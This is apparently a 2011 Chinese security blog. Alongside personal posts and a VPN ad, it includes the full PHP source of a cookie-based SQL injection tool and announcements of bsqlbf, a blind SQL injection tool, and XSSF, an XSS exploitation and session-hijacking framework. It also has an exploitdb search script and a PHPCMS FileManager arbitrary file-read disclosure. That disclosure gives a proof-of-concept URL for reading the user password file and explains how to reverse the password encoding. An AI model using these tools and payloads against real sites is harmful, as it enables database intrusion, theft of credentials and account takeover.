博客园_# Nig3h_Blog

SchramCookie Inject ver 1.0

2011-11-07T06:40:00Z

<?php
    /*######################################################################### * /
     *
     *        - >> SchramCookie Inject ver 1.0 
     *           C0de by Nig3h -Greetz To All H3xIe Member.
     *               link : xiaosan.cnblogs.com
     *                   ex : http://host/?url={$argv[0]}?id = variable;
     *
     *######################################################################### */

    ini_set("max_execution_time", 0);
    $Current_Host = null;
    $Inj_Page = null;
    $Query_String = null;
    $Self = null;
    $Query_Value = null;
    if (empty($_GET["url"])) die("<h5>Please Enter Query_String.</h5>");
    Auto_($_GET["url"], $_GET["id"]);
    function Printf_Info()
    {
        GlOBAL $Current_Host, $Inj_Page, $Query_String, $Self, $Query_Value;
        $Magic_Quotes_GPC_Bool = False;
        if (get_magic_quotes_gpc()) $Magic_Quotes_GPC_Bool = True;
        $GPC_Status = $Magic_Quotes_GPC_Bool == True?"On":"Off";
        echo '<html>'."\n";
        echo '<head><style type="text/css">'."\n";
        echo 'body{background-color: #CCE8CF; Font-size:12px;}.Style{font-size:11px;}'."\n";
        echo '</style></head>'."\n";
        echo '<body>'."\n";
        echo '<!-- Auth0r : Nig3h -->'."\n";
        echo '<br />'."\n";
        echo '<div align="center" >';
        echo '$_SERVER[<Font Color="red">PHP_SELF</Font>] : '.$Self.'<br />'."\n";
        echo 'HOST : '.$Current_Host.'<br />'."\n";
        echo 'Magic_Quotes_GPC : '.'<strong>'.$GPC_Status.'</strong><br />'."\n";
        echo 'Query_String : '.$Query_String.'<br />'."\n";
        echo 'GET[ID]_Value : <strong><Font Color="Red">'.$Query_Value.'</Font></strong><br />'."\n";
        echo 'Inject Page : '.$Inj_Page.'<br />'."\n";
        echo 'Time : '.Date("M-D-Y").'<br />'."\n";
        echo '<hr>';
        echo '</div>';
        echo '</body>'."\n";
        echo '</html>'."\n";
    }        

    function Auto_($url, $id)
    {
        $url_len = strlen($url);
        $str_http = str_replace(chr(92), '//', strtolower(substr($url, 0, 7)));
        if ($str_http == 'http://')
        {
            $host = substr($url, 7, $url_len);
        }
        for ($i = 0; $i <= strlen($host); $i++)
        {
            if (($host[$i] == '/') or ($host[$i] == chr(92)))
            {
                $_Current_Host = substr($host, 0, $i);
                break;
            }
        }
        $Scr_Name = substr($host, $i, $url_len);
        $url_i = strlen($Scr_Name) + 1;
        $Scr_Begin = $i;
        for ($i = 0; $i < strlen($Scr_Name); $i++)
        {    
            $url_i = $url_i - 1;
            if ($Scr_Name[$url_i] == '?')
            {
                $_Inj_Page = substr($Scr_Name, 0, $url_i); # sql_inject Page;
                break;
            }
        }
        GLOBAL $Query_String, $Current_Host,  $Inj_Page, $Query_Value, $Self;
        $Query_String = substr($Scr_Name, $url_i+1, strpos($Scr_Name, '=') - $url_i -1); # Query_String;
        $Current_Host = $_Current_Host;
        $Inj_Page = $_Inj_Page;
        $Query_Value = $id;
        $Self = $_SERVER['PHP_SELF'];
        Printf_Info();
        Ini_Main($Current_Host, $Inj_Page, $Query_String, $id);
    }

    function Ini_Main($Current_Host, $Inj_Page, $Query_String, $id)
    {
        # Config    
        $Page_ID = $Query_String;
        $Host = $Current_Host;
        $Inj_Page = $Inj_Page;
        # END_CONFIG
        $inj_id = $id;
        $inj_id = str_replace("=", "%3D", $id);
        $inj_id = str_replace(" ", "%20", $inj_id);
        $Cookie_Str = "XUJUSPNGRWXKIXLMZRTR=NGQIVFESDSNWCEBNMJSJDEIAMQVQWZMKOLMOZRCG;"."$Page_ID=$inj_id";
        //$Data_Str = "id= $id";
        $_HTTP_SEND_rs = POST($Host, 80, $Inj_Page, $Data_Str, 1000, $Cookie_Str); 
        echo $_HTTP_SEND_rs;
    }
    function Kill_Waste($str)
    {
        $str = strtolower($str);
        $str = str_replace('<script', '<!-- ', $str);
        $str = str_replace('</script', ' -->', $str);
        $str = str_replace('<style', '<!-- ', $str);
        $str = str_replace('</style', ' -->', $str);
        $str = str_replace('<head', '<!-- ', $str);
        $str = str_replace('</head', ' -->', $str);
        return $str;
    }

    function POST($host,$port,$path,$data,$timeout, $cookie='') 
    {
        $buffer='';
        $fp = fsockopen($host,$port,$errno,$errstr,$timeout);
        if(!$fp) die($host.'/'.$path.' : '.$errstr.$errno); 
        else {
                 fputs($fp, "POST $path HTTP/1.0\r\n");
                 fputs($fp, "Host: $host\r\n");
                 fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n");
                 fputs($fp, "Cookie: $cookie\r\n");
                 fputs($fp, "Content-length: ".strlen($data)."\r\n");
                 fputs($fp, "Connection: close\r\n\r\n");
                 fputs($fp, $data."\r\n\r\n");
                 $headers = "";
                 while ($str = trim(fgets($fp,4096)))
                 $headers .= "$str\n"; 
                 while(!feof($fp)) 
                 {
                     $buffer .= Kill_Waste(fgets($fp,4096));
                 } 
                     fclose($fp);
             } 
        return $buffer;
    } 
?>

Download demo:

http://files.cnblogs.com/xiaosan/SchramInj_demo.zip

本文链接

CyberGhost Free VPN

2011-11-06T11:17:00Z

Includes 1 GB of traffic
Access to Free servers
Limited availability with possible waiting times
Forced disconnection after 6 hours (redial possible)
Bandwidth limited to 2 Mbps

http://cyberghostvpn.com/en/product/purchase.html

本文链接

bsqlbf v2.3 Released – Blind SQL Injection Brute Forcing Tool

2011-11-04T16:54:00Z

This perl script allows extraction of data from Blind SQL Injections. It accepts custom SQL queries as a command line parameter and it works for both integer and string based injections.

We reported bsqlbf when it first hit the net back in April 2006 with bsqlbf v1.1, then the v2.0 update in June 2008. This new update adds much better Oracle support.

Databases supported:
MS-SQL
MySQL
PostgreSQL
Oracle

The 6 Attack Models
Type 0: Blind SQL Injection based on true and false conditions returned by back-end server
Type 1: Blind SQL Injection based on true and error(e.g syntax error) returned by back-end server.
Type 2: Blind SQL Injection in “order by” and “group by”.
Type 3: extracting data with SYS privileges (ORACLE dbms_export_extension exploit)
Type 4: is O.S code execution (ORACLE dbms_export_extension exploit)
Type 5: is reading files (ORACLE dbms_export_extension exploit, based on java)

New additions

-type: Type of injection:

3: Type 3 is extracting data with DBA privileges
(e.g. Oracle password hashes from sys.user$)
4: Type 4 is O.S code execution(default: ping 127.0.0.1)
5: Type 5 is Reading O.S files(default: c:\boot.ini)

Type 4 (O.S code execution) supports the following sub types:

-stype: How you want to execute command:

0: SType 0 (default) is based on java,
universal but won’t work against XE
1: SType 1 against oracle 9 with plsql_native_make_utility
2: SType 2 against oracle 10 with dbms_scheduler

You can download bsqlbf v2.3 here:

bsqlbf-v2-3.pl

本文链接

XSSF v2.1 - Cross-Site Scripting Framework

2011-11-04T16:42:00Z

The Cross-Site Scripting Framework (XSSF) is a security tool designed to turn the XSS vulnerability exploitation task into a much easier work. The XSSF project aims to demonstrate the real dangers of XSS vulnerabilities, vulgarizing their exploitation. This project is created solely for education, penetration testing and lawful research purposes.

XSSF allows creating a communication channel with the targeted browser (from a XSS vulnerability) in order to perform further attacks. Users are free to select existing modules (a module = an attack) in order to target specific browsers.

XSSF provides a powerfull documented API, which facilitates development of modules and attacks. In addition, its integration into the Metasploit Framework allows users to launch MSF browser based exploit easilly from an XSS vulnerability.

In addition, an interesting though exploiting an XSS inside a victim's browser could be to browse website on attacker's browser, using the connected victim's session. In most of cases, simply stealing the victim cookie will be sufficient to realize this action. But in minority of cases (intranets, network tools portals, etc.), cookie won't be useful for an external attacker. That's why XSSF Tunnel was created to help the attacker to help the attacker browsing on affected domain using the victim's session.

Изменения:

Ruby versions prior to 1.9.* should be working fine with XSSF
Webrick FileHandler implementation for faster XSSF files resources handler
Fixed URL with quote character handling bug in tunnel mode since revision 12
Added check in tunnel mode in order to prevent attacker from loading XSSF script
Better management with older Ruby versions
Server port separation between victims (attacks) and attacker resources (GUI + Proxy). Attacker sevices port = Victims services port + 1
New commands to see logs within console directly
Removed useless comands firing some bugs sometimes (xssf_test, xssf_logs, xssf_stats, xssf_help). Replaced with xssf_urls
Better public mode management for GUI and XSSF Tunnel remote access
Cleaned and modified help files

XSSF Wiki
Скачать

本文链接

换行符引发的恐慌....

2011-10-28T09:04:00Z

今天在写东西的时候, 突然冒出一个问题让我百思不得其解. 问题出在哪呢？让我一一道来. 首先我先访问编写好的一个页面, 然后我用浏览器打开源码一看. 在HTML 标签前面出现了N个换行符, 虽然这些不会在浏览器上表现出来, 但是让人觉的很不美观. 这到底怎么回事呢？刚开始我也不知道,我也认为可能是编码上的问题, 但是翻了几个引用的文件都找不出眉目。不能淡定之时, 我把引用的文件Ctrl+X全部给剪切掉. 终于被我发现了一个惊天的秘密... oh,my god 然来">" 后面有N个换行符...所以大家要养成良好的编码习惯, 以免给自己添加一些纠结的蛋疼的问题.

本文链接

博客终于恢复了.

2011-10-20T08:52:00Z

昨天, 就突然一下子打不开了. 我很郁闷, 想到最近网络站点内容审查, 会不会是这个原因呢? 想了又想得出的结论----又是天朝... 为了讨回我这小小守法的公民公道, 只好联系博客园的人, 在各种解释后. 今天打开mail, 收到一了一封博客启动的邮件. 哈哈, 很激动. 感谢博客园的朋友们细心审核. baidu好,sina好.qqzone好, 封了让你直抓挠, 用博客就用博客园.

本文链接

早晨~~~~

2011-10-18T04:27:00Z

不经意间双眼望向窗外, 发现外面的一切是如此的安详, 是一个美丽的早晨. 马路上,车来车往. 阳光遍布着一栋栋楼房. 一切真美好Y.

本文链接

exploitdbee.py 1.0

2011-10-03T14:05:00Z

Easily search for exploits in BackTrack's exploitdb (files.csv).

Highlights:
Search the exploitdb archive
Case sensitive & insensitive
Change output mode
Automaticlly copy your exploits
Requirements:
python (tested with python 2.7.1 and 2.5.2)
local exploitdb (pre-installed on BackTrack Linux)

Usage:

exploitdbee.py [-c] [-d path] 
exploitdbee.py "windows 7" remote 
exploitdbee.py -c Microsoft IIS -d /tmp

Options:
--version show program's version number and exit
-h, --help show this help message and exit
-c, --casesensitive switch to casesensitive
-v, --verbose detailed output
-d PATH, --destination=PATH path to copy exploits

Code:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# exploitdbee.py
# 
# Version: 1.0
# 
# Copyright (C) 2011  novacane novacane[at]dandies[dot]org
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program.  If not, see <http://www.gnu.org/licenses/>.
#

import sys
import os
import re
import shutil
from getpass import getpass
from optparse import OptionParser

def main(casesensitive, verbose, exploitpath, *args):
    
    exploitdbcsv = "/pentest/exploits/exploitdb/files.csv"

    if not os.path.isfile(exploitdbcsv):
        print "ERROR: EXPLOITDB DOESN'T EXIST"
        sys.exit(1)
    
    # Open the exploitdb.
    try:
        f = open(exploitdbcsv)
    except:
        print "ERROR: CAN'T OPEN EXPLOITDB - FILES.CSV"
        sys.exit(1)

    exploitlist = []
    
    # First: Search the exploitdb and save the results to a list.
    for line in f:
        if casesensitive:
            if re.search(re.escape(args[0][0]), line):
                exploitlist.append(line)
        elif not casesensitive:
            if re.search(re.escape(args[0][0]), line, re.I):
                exploitlist.append(line)

    # The number of loops is the number of arguments.
    i = 1
    arglen = len(args[0])
    
    # Second: Cleanup the initial list.
    # Loop through the list and remove all items which don't match the remaining argument(s).
    if arglen > 1:
        while True:
            # Make a copy of the list to iterate over it.
            for l in exploitlist[:]:
                if casesensitive:
                    if not re.search(re.escape(args[0][i]), l):
                        exploitlist.remove(l)
                elif not casesensitive:
                    if not re.search(re.escape(args[0][i]), l, re.I):
                        exploitlist.remove(l)
            i += 1
            if i == arglen: break
    
    # Output found exploits.
    for i in exploitlist:
        if verbose:
            print i.strip("\n")
        else:
            print i.split(",")[2] + "  =>  " + i.split(",")[1]
    print "\n"
    
    print str(len(exploitlist)) + " EXPLOITS FOUND."
    
    f.close()
    
    if not exploitpath:
        sys.exit()
    
    # Copy the exploits.
    while True:
        try:
            copyinput = raw_input("Copy exploits to destination? [y/n]: ")
            if copyinput == "y":
                if os.path.isdir(exploitpath):
                    try:
                        for i in exploitlist:
                            shutil.copy("/pentest/exploits/exploitdb/" + i.split(",")[1], exploitpath)
                    except:
                        print "ERROR: CAN'T COPY FILES TO DESTINATION"
                        sys.exit(1)
                else:
                    print "ERROR: DESTINATION DOESN'T EXIST"
                break
            elif copyinput == "n":
                print "BYE"
                sys.exit()
            else:
                print "ERROR: WRONG INPUT"
        except KeyboardInterrupt:
                print "\n"
                sys.exit(1)

if __name__ == '__main__':
    
    help_message = "\n\t[*] exploitdbee 1.0[*]\n\t[*] by dandies.org[*]\n\n\tTry: exploitdbee.py  --help\n"
    usage = "\n  %prog [-c] [-d path] <term1> <term2> <term3> <term...>\n  %prog \"windows 7\" remote \
            \n  %prog -c Microsoft IIS -d /tmp"
    parser = OptionParser(usage=usage, version="%prog 1.0")
    parser.add_option("-c", "--casesensitive", action="store_true",
                    dest="casesensitive", help="switch to casesensitive")
    parser.add_option("-v", "--verbose", action="store_true",
                    dest="verbose", help="detailed output")
    parser.add_option("-d", "--destination", metavar="PATH",
                    dest="exploitpath", help="path to copy exploits")
    
    (options, args) = parser.parse_args()
    
    if len(args) == 0:
        print help_message
        sys.exit(2)

    # Default values.
    if options.exploitpath:
        exploitpath = options.exploitpath
    else:
        exploitpath = ""
    if options.casesensitive:
        casesensitive = 1
    else:
        casesensitive = 0
    if options.verbose:
        verbose = 1
    else:
        verbose = 0
    
    main(casesensitive, verbose, exploitpath, args)[Doar userii inregistrati pot vedea linkurile. ]

本文链接

发点牢骚。。。

2011-10-02T01:27:00Z

再次更新了下博客... 调来调去, X疼死了. 各位感觉怎么样? 另外最近不知怎么了, 不喜欢睡觉...难道失眠了? 好了不说了, 睡觉。。累。。。

本文链接

PHPCMS FileManager v4.03 FileRead Vulnerability

2011-09-30T20:46:00Z

#
#Author : HeXie S3curity TeAm
#Date : 2011.10.01
#

#FIle : /image.php
<?php
/*
*#########################################
* PHPCMS File Manager
* Copyright (c) 2004-2006 phpcms.cn
* Author: Longbill ( http://www.longbill.cn )
* longbill.cn@gmail.com
*#########################################
*/

$path = $_GET["path"]; //读取路径信息
$from = $_SERVER[HTTP_REFERER];
$from = dirname($from).'/';
if ($from != '/' ) $path = str_replace($from,"",$path);


$max = $_GET["max"];
include_once("func.php");
$etag = "qqqq";
if ($_SERVER['HTTP_IF_NONE_MATCH'] == $etag)
{
	header('Etag:'.$etag,true,304);
	exit;
}
else header('Etag:'.$etag);
header('Last-Modified:Tue,01 Aug 1999 10:26:24 GMT');

if (!$path || !file_exists($path))  $path="images/notfound.gif"; //图片没有找到
if (!$max) err();  //{通过Get方法传递的Max变量, 当$Max不成立时将调用err 函数.}

我们来看看err 函数是怎么写的.

FiLe : /image.php

function err()
{
global $path;
header("Content-Length: ".@filesize($path));
readfile($path); //读取$path.
die;
}

PoC:

http://Localhost/cms/image.php?path=class/users.php //读取密码文件, 前台登陆.

如果没有显示,请右键源码形式打开.

密码是经过加密的, 但不并不是单一的Md5 hash. 密码加密第一步是将原文经过base64编码后然后利用strrev 函数从字符串末尾向前重组.

得到md5 hash 后, 先逆着打出来, 比如 321, 就写成123. 然后根据base64 编码方式进行解密, 密码原文就出来了.

end.

本文链接